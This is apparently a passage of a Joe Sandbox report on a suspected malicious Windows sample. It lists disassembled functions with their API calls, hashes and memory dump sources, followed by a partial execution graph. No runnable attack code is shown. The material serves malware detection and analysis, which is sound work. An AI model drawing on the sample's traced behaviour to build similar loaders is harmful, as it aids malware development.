                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1096550386-0
                                                                                                                                                                              • Opcode ID: 3e0ed09429b2810d786af02a1c3bfa28639d1a50068665dacc7acd0a01df1c0d
                                                                                                                                                                              • Instruction ID: 87fb012067345ee1b988bd5fb10086e8901e4dbe358c5eced420cf9855421b75
                                                                                                                                                                              • Opcode Fuzzy Hash: 3e0ed09429b2810d786af02a1c3bfa28639d1a50068665dacc7acd0a01df1c0d
                                                                                                                                                                              • Instruction Fuzzy Hash: A651B47250030BAFFB498F6C8C84EBB3AA9EF95314B124929FD04D6550EB30DD5286B8
                                                                                                                                                                              Function 6D5D08A2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D5D0853,00000000,?,00000001,?,?,?,6D5D0942,00000001,FlsFree,6D5DC5C8,FlsFree), ref: 6D5D08AF
                                                                                                                                                                              • GetLastError.KERNEL32(?,6D5D0853,00000000,?,00000001,?,?,?,6D5D0942,00000001,FlsFree,6D5DC5C8,FlsFree,00000000,?,6D5D03A1), ref: 6D5D08B9
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D5D08E1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                              • Opcode ID: fac8fef39d866e3339dbc22f398244dd270e9aee66f4892530b333e9c64c862e
                                                                                                                                                                              • Instruction ID: b6b88c1c1d9f7babfd8ab43a4cdc93037025e74826a08b3f2f20521a511f245a
                                                                                                                                                                              • Opcode Fuzzy Hash: fac8fef39d866e3339dbc22f398244dd270e9aee66f4892530b333e9c64c862e
                                                                                                                                                                              • Instruction Fuzzy Hash: 2DE04830244209BBEF541A6ADC05B2D3B75AF01745F214431F90DE5CD0E7A2955095EC
                                                                                                                                                                              Function 6D5D7101 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(6E8FD2E3,00000000,00000000,?), ref: 6D5D7164
                                                                                                                                                                                • Part of subcall function 6D5D4A41: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D5D6B9F,?,00000000,-00000008), ref: 6D5D4AA2
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6D5D73B6
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D5D73FC
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6D5D749F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                              • Opcode ID: ffbdd2bba0a07a1c18162d129ecb91c7f213c2c760ecaf84ddb1cc7d68ddb05c
                                                                                                                                                                              • Instruction ID: fbe6c82761cdb6dafe75816f0e7fd4063ae22c9dfce07e5fecc1c554fd4aa80d
                                                                                                                                                                              • Opcode Fuzzy Hash: ffbdd2bba0a07a1c18162d129ecb91c7f213c2c760ecaf84ddb1cc7d68ddb05c
                                                                                                                                                                              • Instruction Fuzzy Hash: B2D19A75D042489FCF1ACFECC880AADBBB5FF49314F14856AE466EB641D730A942CB64
                                                                                                                                                                              Function 6D5D0A23 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                              • Opcode ID: adbb300ace0781a43156a6700966a7c4f5c98475e8dbd9d963465033776eb411
                                                                                                                                                                              • Instruction ID: 57ce9160272805a56168a3588f5827d57769e40c1be4ad6b1f81f054dfbc1b7e
                                                                                                                                                                              • Opcode Fuzzy Hash: adbb300ace0781a43156a6700966a7c4f5c98475e8dbd9d963465033776eb411
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A51C072508602AFEB5D8F5ED880BBA73A4FF50319F10496ED91547A90D731E940CBB8
                                                                                                                                                                              Function 6D5D368D Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6D5D4A41: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D5D6B9F,?,00000000,-00000008), ref: 6D5D4AA2
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6D5D36F1
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6D5D36F8
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 6D5D3732
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6D5D3739
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                              • Opcode ID: ec2e2b9240b746ba3bcf0411eb0a6fc7937bcfef31657d892d2c0ef47fd13e52
                                                                                                                                                                              • Instruction ID: b828924261bd1413df7eeb8ebc13f877a3cee0adfb5c3164b3011fdc96329d2c
                                                                                                                                                                              • Opcode Fuzzy Hash: ec2e2b9240b746ba3bcf0411eb0a6fc7937bcfef31657d892d2c0ef47fd13e52
                                                                                                                                                                              • Instruction Fuzzy Hash: 9221CB71608605AFEB899F6DCC8095B77B9FF407647058818E92987E40DB31FD008B78
                                                                                                                                                                              Function 6D5D4AE4 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 6D5D4AEC
                                                                                                                                                                                • Part of subcall function 6D5D4A41: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D5D6B9F,?,00000000,-00000008), ref: 6D5D4AA2
                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D5D4B24
                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D5D4B44
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                              • Opcode ID: 18250cf37f5b4789cc18fb335c190b6aab46424dcb370da82aa73d2188bdd21b
                                                                                                                                                                              • Instruction ID: e1df4f00ce070fe66d147a09b315670e16ad1b88ac7e9f99465c7a79149b995b
                                                                                                                                                                              • Opcode Fuzzy Hash: 18250cf37f5b4789cc18fb335c190b6aab46424dcb370da82aa73d2188bdd21b
                                                                                                                                                                              • Instruction Fuzzy Hash: 1011E1B15092157FBF8A27BD4C8CD6F7A7DDEAA2A87020524F50592900EB34CD0181BD
                                                                                                                                                                              Function 6D5D8806 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6D5D7FC5,00000000,00000001,00000000,?,?,6D5D74F3,?,00000000,00000000), ref: 6D5D881D
                                                                                                                                                                              • GetLastError.KERNEL32(?,6D5D7FC5,00000000,00000001,00000000,?,?,6D5D74F3,?,00000000,00000000,?,?,?,6D5D7A96,00000000), ref: 6D5D8829
                                                                                                                                                                                • Part of subcall function 6D5D87EF: CloseHandle.KERNEL32(FFFFFFFE,6D5D8839,?,6D5D7FC5,00000000,00000001,00000000,?,?,6D5D74F3,?,00000000,00000000,?,?), ref: 6D5D87FF
                                                                                                                                                                              • ___initconout.LIBCMT ref: 6D5D8839
                                                                                                                                                                                • Part of subcall function 6D5D87B1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D5D87E0,6D5D7FB2,?,?,6D5D74F3,?,00000000,00000000,?), ref: 6D5D87C4
                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6D5D7FC5,00000000,00000001,00000000,?,?,6D5D74F3,?,00000000,00000000,?), ref: 6D5D884E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                              • Opcode ID: 68f403d659f8e60884bbf5e8e37abb878edc54ebc5790ad9e21a0626e4022d59
                                                                                                                                                                              • Instruction ID: 546a75c548e7e9906f929bcf500cb6efb26ad786c39322b77beb860ea71070f0
                                                                                                                                                                              • Opcode Fuzzy Hash: 68f403d659f8e60884bbf5e8e37abb878edc54ebc5790ad9e21a0626e4022d59
                                                                                                                                                                              • Instruction Fuzzy Hash: C8F03036000129BBCF662F96CC04A9D3F77FB497A1B154854FE2995920DB328D60EBA9
                                                                                                                                                                              Function 6D5CFD20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6D5CFD5F
                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6D5CFE13
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                              • String ID: csm
                                                                                                                                                                              • API String ID: 3480331319-1018135373
                                                                                                                                                                              • Opcode ID: 03b504218a3af59a4a14ac5ba547f30ff16c82d12e32624a437b809729dbe39a
                                                                                                                                                                              • Instruction ID: 9138cc68f969894dbae0496ed4900b5017bc4fcab1e7dc7f26f764d2806e8168
                                                                                                                                                                              • Opcode Fuzzy Hash: 03b504218a3af59a4a14ac5ba547f30ff16c82d12e32624a437b809729dbe39a
                                                                                                                                                                              • Instruction Fuzzy Hash: 6D410634A0520AAFCF08CFACC884BAE7BF1BF45318F10845AE9149B755D731DA05CBA2
                                                                                                                                                                              Function 6D5D101F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,?), ref: 6D5D1044
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                              • Opcode ID: 88a18868f7f3fc357dcce997a95f1cacfec465940c0c53d635fbd863feb9b111
                                                                                                                                                                              • Instruction ID: 62ae29dbee7b291dbc84ac20e893046dbf7bd0790cc1319f6104bfa85a924bf7
                                                                                                                                                                              • Opcode Fuzzy Hash: 88a18868f7f3fc357dcce997a95f1cacfec465940c0c53d635fbd863feb9b111
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B41AB3190020AAFCF4ADF98CC80EEEBBB5FF88304F158559FA15A7614D335A950DB65

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:4.7%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:3.4%
                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                              Total number of Limit Nodes:29
                                                                                                                                                                              execution_graph 74231 6ca63060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 74236 6ca9ab2a 74231->74236 74235 6ca630db 74240 6ca9ae0c _crt_atexit _register_onexit_function 74236->74240 74238 6ca630cd 74239 6ca9b320 5 API calls ___raise_securityfailure 74238->74239 74239->74235 74240->74238 74241 6ca635a0 74242 6ca635c4 InitializeCriticalSectionAndSpinCount getenv 74241->74242 74257 6ca63846 __aulldiv 74241->74257 74243 6ca638fc strcmp 74242->74243 74256 6ca635f3 __aulldiv 74242->74256 74245 6ca63912 strcmp 74243->74245 74243->74256 74245->74256 74246 6ca635f8 QueryPerformanceFrequency 74246->74256 74247 6ca638f4 74248 6ca63622 _strnicmp 74250 6ca63944 _strnicmp 74248->74250 74248->74256 74249 6ca6376a QueryPerformanceCounter EnterCriticalSection 74251 6ca637b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 74249->74251 74255 6ca6375c 74249->74255 74252 6ca6395d 74250->74252 74250->74256 74254 6ca637fc LeaveCriticalSection 74251->74254 74251->74255 74253 6ca63664 GetSystemTimeAdjustment 74253->74256 74254->74255 74254->74257 74255->74249 74255->74251 74255->74254 74255->74257 74256->74246 74256->74248 74256->74250 74256->74252 74256->74253 74256->74255 74258 6ca9b320 5 API calls ___raise_securityfailure 74257->74258 74258->74247 74259 6ca9b8ae 74261 6ca9b8ba ___scrt_is_nonwritable_in_current_image 74259->74261 74260 6ca9b8c9 74261->74260 74262 6ca9b8e3 dllmain_raw 74261->74262 74264 6ca9b8de 74261->74264 74262->74260 74263 6ca9b8fd dllmain_crt_dispatch 74262->74263 74263->74260 74263->74264 74272 6ca7bed0 DisableThreadLibraryCalls LoadLibraryExW 74264->74272 74266 6ca9b91e 74267 6ca9b94a 74266->74267 74273 6ca7bed0 DisableThreadLibraryCalls LoadLibraryExW 74266->74273 74267->74260 74268 6ca9b953 dllmain_crt_dispatch 74267->74268 74268->74260 74270 6ca9b966 dllmain_raw 74268->74270 74270->74260 74271 6ca9b936 dllmain_crt_dispatch dllmain_raw 74271->74267 74272->74266 74273->74271 74274 6ca7c930 GetSystemInfo VirtualAlloc 74275 6ca7c9a3 GetSystemInfo 74274->74275 74276 6ca7c973 74274->74276 74278 6ca7c9b6 74275->74278 74279 6ca7c9d0 74275->74279 74290 6ca9b320 5 API calls ___raise_securityfailure 74276->74290 74278->74279 74282 6ca7c9bd 74278->74282 74279->74276 74280 6ca7c9d8 VirtualAlloc 74279->74280 74283 6ca7c9f0 74280->74283 74284 6ca7c9ec 74280->74284 74281 6ca7c99b 74282->74276 74285 6ca7c9c1 VirtualFree 74282->74285 74291 6ca9cbe8 GetCurrentProcess TerminateProcess 74283->74291 74284->74276 74285->74276 74290->74281 74292 6ca9b830 74293 6ca9b83b 74292->74293 74294 6ca9b86e dllmain_crt_process_detach 74292->74294 74295 6ca9b860 dllmain_crt_process_attach 74293->74295 74296 6ca9b840 74293->74296 74294->74296 74295->74296 74297 6ca9b9c0 74298 6ca9b9c9 74297->74298 74299 6ca9b9ce dllmain_dispatch 74297->74299 74301 6ca9bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 74298->74301 74301->74299 74302 6ca9b694 74303 6ca9b6a0 ___scrt_is_nonwritable_in_current_image 74302->74303 74332 6ca9af2a 74303->74332 74305 6ca9b6a7 74306 6ca9b6d1 74305->74306 74307 6ca9b796 74305->74307 74317 6ca9b6ac ___scrt_is_nonwritable_in_current_image 74305->74317 74336 6ca9b064 74306->74336 74349 6ca9b1f7 IsProcessorFeaturePresent 74307->74349 74310 6ca9b6e0 __RTC_Initialize 74310->74317 74339 6ca9bf89 InitializeSListHead 74310->74339 74311 6ca9b7b3 ___scrt_uninitialize_crt __RTC_Initialize 74313 6ca9b6ee ___scrt_initialize_default_local_stdio_options 74318 6ca9b6f3 _initterm_e 74313->74318 74314 6ca9b79d ___scrt_is_nonwritable_in_current_image 74314->74311 74315 6ca9b828 74314->74315 74316 6ca9b7d2 74314->74316 74321 6ca9b1f7 ___scrt_fastfail 6 API calls 74315->74321 74353 6ca9b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 74316->74353 74318->74317 74320 6ca9b708 74318->74320 74340 6ca9b072 74320->74340 74324 6ca9b82f 74321->74324 74322 6ca9b7d7 74354 6ca9bf95 __std_type_info_destroy_list 74322->74354 74327 6ca9b83b 74324->74327 74328 6ca9b86e dllmain_crt_process_detach 74324->74328 74326 6ca9b70d 74326->74317 74329 6ca9b711 _initterm 74326->74329 74330 6ca9b860 dllmain_crt_process_attach 74327->74330 74331 6ca9b840 74327->74331 74328->74331 74329->74317 74330->74331 74333 6ca9af33 74332->74333 74355 6ca9b341 IsProcessorFeaturePresent 74333->74355 74335 6ca9af3f ___scrt_uninitialize_crt 74335->74305 74356 6ca9af8b 74336->74356 74338 6ca9b06b 74338->74310 74339->74313 74341 6ca9b077 ___scrt_release_startup_lock 74340->74341 74342 6ca9b07b 74341->74342 74343 6ca9b082 74341->74343 74366 6ca9b341 IsProcessorFeaturePresent 74342->74366 74345 6ca9b087 _configure_narrow_argv 74343->74345 74347 6ca9b092 74345->74347 74348 6ca9b095 _initialize_narrow_environment 74345->74348 74346 6ca9b080 74346->74326 74347->74326 74348->74346 74350 6ca9b20c ___scrt_fastfail 74349->74350 74351 6ca9b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 74350->74351 74352 6ca9b302 ___scrt_fastfail 74351->74352 74352->74314 74353->74322 74354->74311 74355->74335 74357 6ca9af9a 74356->74357 74358 6ca9af9e 74356->74358 74357->74338 74359 6ca9b028 74358->74359 74362 6ca9afab ___scrt_release_startup_lock 74358->74362 74360 6ca9b1f7 ___scrt_fastfail 6 API calls 74359->74360 74361 6ca9b02f 74360->74361 74363 6ca9afb8 _initialize_onexit_table 74362->74363 74365 6ca9afd6 74362->74365 74364 6ca9afc7 _initialize_onexit_table 74363->74364 74363->74365 74364->74365 74365->74338 74366->74346 74367 2a184ae 74368 2a184b0 74367->74368 74419 2a02b68 74368->74419 74377 2a01284 25 API calls 74378 2a184df 74377->74378 74379 2a01284 25 API calls 74378->74379 74380 2a184e9 74379->74380 74534 2a0148a GetPEB 74380->74534 74382 2a184f3 74383 2a01284 25 API calls 74382->74383 74384 2a184fd 74383->74384 74385 2a01284 25 API calls 74384->74385 74386 2a18507 74385->74386 74387 2a01284 25 API calls 74386->74387 74388 2a18511 74387->74388 74535 2a014a2 GetPEB 74388->74535 74390 2a1851b 74391 2a01284 25 API calls 74390->74391 74392 2a18525 74391->74392 74393 2a01284 25 API calls 74392->74393 74394 2a1852f 74393->74394 74395 2a01284 25 API calls 74394->74395 74396 2a18539 74395->74396 74536 2a014f9 74396->74536 74399 2a01284 25 API calls 74400 2a1854d 74399->74400 74401 2a01284 25 API calls 74400->74401 74402 2a18557 74401->74402 74403 2a01284 25 API calls 74402->74403 74404 2a18561 74403->74404 74559 2a01666 GetTempPathW 74404->74559 74407 2a01284 25 API calls 74408 2a18570 74407->74408 74409 2a01284 25 API calls 74408->74409 74410 2a1857a 74409->74410 74411 2a01284 25 API calls 74410->74411 74412 2a18584 74411->74412 74571 2a17041 74412->74571 74996 2a047e8 GetProcessHeap RtlAllocateHeap 74419->74996 74422 2a047e8 3 API calls 74423 2a02b93 74422->74423 74424 2a047e8 3 API calls 74423->74424 74425 2a02bac 74424->74425 74426 2a047e8 3 API calls 74425->74426 74427 2a02bc3 74426->74427 74428 2a047e8 3 API calls 74427->74428 74429 2a02bda 74428->74429 74430 2a047e8 3 API calls 74429->74430 74431 2a02bf0 74430->74431 74432 2a047e8 3 API calls 74431->74432 74433 2a02c07 74432->74433 74434 2a047e8 3 API calls 74433->74434 74435 2a02c1e 74434->74435 74436 2a047e8 3 API calls 74435->74436 74437 2a02c38 74436->74437 74438 2a047e8 3 API calls 74437->74438 74439 2a02c4f 74438->74439 74440 2a047e8 3 API calls 74439->74440 74441 2a02c66 74440->74441 74442 2a047e8 3 API calls 74441->74442 74443 2a02c7d 74442->74443 74444 2a047e8 3 API calls 74443->74444 74445 2a02c93 74444->74445 74446 2a047e8 3 API calls 74445->74446 74447 2a02caa 74446->74447 74448 2a047e8 3 API calls 74447->74448 74449 2a02cc1 74448->74449 74450 2a047e8 3 API calls 74449->74450 74451 2a02cd8 74450->74451 74452 2a047e8 3 API calls 74451->74452 74453 2a02cf2 74452->74453 74454 2a047e8 3 API calls 74453->74454 74455 2a02d09 74454->74455 74456 2a047e8 3 API calls 74455->74456 74457 2a02d20 74456->74457 74458 2a047e8 3 API calls 74457->74458 74459 2a02d37 74458->74459 74460 2a047e8 3 API calls 74459->74460 74461 2a02d4e 74460->74461 74462 2a047e8 3 API calls 74461->74462 74463 2a02d65 74462->74463 74464 2a047e8 3 API calls 74463->74464 74465 2a02d7c 74464->74465 74466 2a047e8 3 API calls 74465->74466 74467 2a02d92 74466->74467 74468 2a047e8 3 API calls 74467->74468 74469 2a02dac 74468->74469 74470 2a047e8 3 API calls 74469->74470 74471 2a02dc3 74470->74471 74472 2a047e8 3 API calls 74471->74472 74473 2a02dda 74472->74473 74474 2a047e8 3 API calls 74473->74474 74475 2a02df1 74474->74475 74476 2a047e8 3 API calls 74475->74476 74477 2a02e07 74476->74477 74478 2a047e8 3 API calls 74477->74478 74479 2a02e1e 74478->74479 74480 2a047e8 3 API calls 74479->74480 74481 2a02e35 74480->74481 74482 2a047e8 3 API calls 